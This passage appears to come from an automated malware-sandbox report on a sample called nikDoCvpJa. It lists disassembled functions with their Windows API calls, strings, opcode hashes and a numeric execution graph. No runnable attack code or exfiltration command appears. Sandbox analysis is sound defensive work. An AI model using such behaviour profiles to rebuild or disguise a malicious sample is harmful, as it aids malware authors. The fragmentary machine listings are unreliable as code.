                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcatwsprintf
                                                                                    • String ID: %02x%c$...
                                                                                    • API String ID: 3065427908-1057055748
                                                                                    • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                    • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                    • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                    • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                    • API String ID: 2266616436-4211696005
                                                                                    • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                    • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                    • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                    • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426576,759223A0,00000000), ref: 00406902
                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1599320355-0
                                                                                    • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                    • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                    • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                    • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                    APIs
                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                    • String ID: Version
                                                                                    • API String ID: 512980652-315105994
                                                                                    • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                    • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                    • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                    • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                    • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                    • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                    • String ID:
                                                                                    • API String ID: 2883127279-0
                                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                    APIs
                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                    • String ID: !N~
                                                                                    • API String ID: 623250636-529124213
                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                    Strings
                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID: Error launching installer
                                                                                    • API String ID: 3712363035-66219284
                                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                    • API String ID: 3509786178-2769509956
                                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.9%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:3.5%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:72
                                                                                    execution_graph 103051 191098 103056 195fc8 103051->103056 103055 1910a7 103077 19bf73 103056->103077 103060 19602c 103075 196062 103060->103075 103094 19adf4 103060->103094 103062 196056 103098 1955dc 103062->103098 103064 19611c GetCurrentProcess IsWow64Process 103065 196138 103064->103065 103066 1d5269 GetSystemInfo 103065->103066 103067 196150 LoadLibraryA 103065->103067 103068 19619d GetSystemInfo 103067->103068 103069 196161 GetProcAddress 103067->103069 103070 196177 103068->103070 103069->103068 103072 196171 GetNativeSystemInfo 103069->103072 103073 19617b FreeLibrary 103070->103073 103074 19109d 103070->103074 103071 1d5224 103072->103070 103073->103074 103076 1b0413 29 API calls __onexit 103074->103076 103075->103064 103075->103071 103076->103055 103102 1b017b 103077->103102 103079 19bf88 103112 1b014b 103079->103112 103081 195fdf GetVersionExW 103082 198577 103081->103082 103083 1d6610 103082->103083 103084 198587 _wcslen 103082->103084 103085 19adf4 22 API calls 103083->103085 103087 19859d 103084->103087 103088 1985c2 103084->103088 103086 1d6619 103085->103086 103086->103086 103137 1988e8 22 API calls 103087->103137 103089 1b014b 22 API calls 103088->103089 103091 1985ce 103089->103091 103093 1b017b 22 API calls 103091->103093 103092 1985a5 __fread_nolock 103092->103060 103093->103092 103095 19ae02 103094->103095 103097 19ae0b __fread_nolock 103094->103097 103095->103097 103138 19c2c9 103095->103138 103097->103062 103099 1955ea 103098->103099 103100 19adf4 22 API calls 103099->103100 103101 1955fe 103100->103101 103101->103075 103104 1b014b 103102->103104 103105 1b016a 103104->103105 103108 1b016c 103104->103108 103122 1bed7c 103104->103122 103129 1b521d 7 API calls 2 library calls 103104->103129 103105->103079 103107 1b09dd 103131 1b3614 RaiseException 103107->103131 103108->103107 103130 1b3614 RaiseException 103108->103130 103111 1b09fa 103111->103079 103113 1b0150 103112->103113 103114 1bed7c ___std_exception_copy 21 API calls 103113->103114 103115 1b016a 103113->103115 103118 1b016c 103113->103118 103134 1b521d 7 API calls 2 library calls 103113->103134 103114->103113 103115->103081 103117 1b09dd 103136 1b3614 RaiseException 103117->103136 103118->103117 103135 1b3614 RaiseException 103118->103135 103121 1b09fa 103121->103081 103127 1c3b93 _abort 103122->103127 103123 1c3bd1 103133 1bf649 20 API calls _abort 103123->103133 103125 1c3bbc RtlAllocateHeap 103126 1c3bcf 103125->103126 103125->103127 103126->103104 103127->103123 103127->103125 103132 1b521d 7 API calls 2 library calls 103127->103132 103129->103104 103130->103107 103131->103111 103132->103127 103133->103126 103134->103113 103135->103117 103136->103121 103137->103092 103139 19c2d9 __fread_nolock 103138->103139 103140 19c2dc 103138->103140 103139->103097 103141 1b014b 22 API calls 103140->103141 103142 19c2e7 103141->103142 103143 1b017b 22 API calls 103142->103143 103143->103139 103144 19105b 103149 1952a7 103144->103149 103146 19106a 103180 1b0413 29 API calls __onexit 103146->103180 103148 191074 103150 1952b7 __wsopen_s 103149->103150 103151 19bf73 22 API calls 103150->103151 103152 19536d 103151->103152 103181 195594 103152->103181 103154 195376 103188 195238 103154->103188 103161 19bf73 22 API calls 103162 1953a7 103161->103162 103209 19bd57 103162->103209 103165 1d4be6 RegQueryValueExW 103166 1d4c7c RegCloseKey 103165->103166 103167 1d4c03 103165->103167 103170 1953d2 103166->103170 103179 1d4c8e _wcslen 103166->103179 103168 1b017b 22 API calls 103167->103168 103169 1d4c1c 103168->103169 103215 19423c 103169->103215 103170->103146 103171 19655e 22 API calls 103171->103179 103174 1d4c44 103175 198577 22 API calls 103174->103175 103176 1d4c5e messages 103175->103176 103176->103166 103178 196a7c 22 API calls 103178->103179 103179->103170 103179->103171 103179->103178 103218 19b329 103179->103218 103180->103148 103224 1d22d0 103181->103224 103184 19b329 22 API calls 103185 1955c7 103184->103185 103226 195851 103185->103226 103187 1955d1 103187->103154 103189 1d22d0 __wsopen_s 103188->103189 103190 195245 GetFullPathNameW 103189->103190 103191 195267 103190->103191 103192 198577 22 API calls 103191->103192 103193 195285 103192->103193 103194 196b7c 103193->103194 103195 1d57fe 103194->103195 103196 196b93 103194->103196 103198 1b014b 22 API calls 103195->103198 103236 196ba4 103196->103236 103200 1d5808 _wcslen 103198->103200 103199 19538f 103203 196a7c 103199->103203 103201 1b017b 22 API calls 103200->103201 103202 1d5841 __fread_nolock 103201->103202 103204 196a8b 103203->103204 103208 196aac __fread_nolock 103203->103208 103206 1b017b 22 API calls 103204->103206 103205 1b014b 22 API calls 103207 19539e 103205->103207 103206->103208 103207->103161 103208->103205 103210 19bd71 103209->103210 103211 1953b0 RegOpenKeyExW 103209->103211 103212 1b014b 22 API calls 103210->103212 103211->103165 103211->103170 103213 19bd7b 103212->103213 103214 1b017b 22 API calls 103213->103214 103214->103211 103216 1b014b 22 API calls 103215->103216 103217 19424e RegQueryValueExW 103216->103217 103217->103174 103217->103176 103219 19b338 _wcslen 103218->103219 103220 1b017b 22 API calls 103219->103220 103221 19b360 __fread_nolock 103220->103221 103222 1b014b 22 API calls 103221->103222 103223 19b376 103222->103223 103223->103179 103225 1955a1 GetModuleFileNameW 103224->103225 103225->103184 103227 1d22d0 __wsopen_s 103226->103227 103228 19585e GetFullPathNameW 103227->103228 103229 195898 103228->103229 103230 19587d 103228->103230 103232 19bd57 22 API calls 103229->103232 103231 198577 22 API calls 103230->103231 103233 195889 103231->103233 103232->103233 103234 1955dc 22 API calls 103233->103234 103235 195895 103234->103235 103235->103187 103237 196bb4 _wcslen 103236->103237 103238 1d5860 103237->103238 103239 196bc7 103237->103239 103241 1b014b 22 API calls 103238->103241 103246 197d74 103239->103246 103243 1d586a 103241->103243 103242 196bd4 __fread_nolock 103242->103199 103244 1b017b 22 API calls 103243->103244 103245 1d589a __fread_nolock 103244->103245 103247 197d8a 103246->103247 103250 197d85 __fread_nolock 103246->103250 103248 1d6528 103247->103248 103249 1b017b 22 API calls 103247->103249 103249->103250 103250->103242 103251 19dd3d 103252 19dd63 103251->103252 103253 1e19c2 103251->103253 103254 19dead 103252->103254 103257 1b014b 22 API calls 103252->103257 103256 1e1a82 103253->103256 103260 1e1a26 103253->103260 103264 1e1a46 103253->103264 103261 1b017b 22 API calls 103254->103261 103328 203fe1 82 API calls __wsopen_s 103256->103328 103263 19dd8d 103257->103263 103258 1e1a7d 103326 1ae6e8 191 API calls 103260->103326 103269 19dee4 __fread_nolock 103261->103269 103265 1b014b 22 API calls 103263->103265 103263->103269 103264->103258 103327 203fe1 82 API calls __wsopen_s 103264->103327 103267 19dddb 103265->103267 103266 1b017b 22 API calls 103266->103269 103267->103260 103268 19de16 103267->103268 103300 1a0340 103268->103300 103269->103264 103269->103266 103271 19de29 103271->103258 103271->103269 103272 1e1aa5 103271->103272 103273 19de77 103271->103273 103275 19d526 103271->103275 103329 203fe1 82 API calls __wsopen_s 103272->103329 103273->103254 103273->103275 103276 1b014b 22 API calls 103275->103276 103277 19d589 103276->103277 103293 19c32d 103277->103293 103280 1b014b 22 API calls 103285 19d66e messages 103280->103285 103284 1e1f79 103331 1f56ae 22 API calls messages 103284->103331 103285->103284 103287 1e1f94 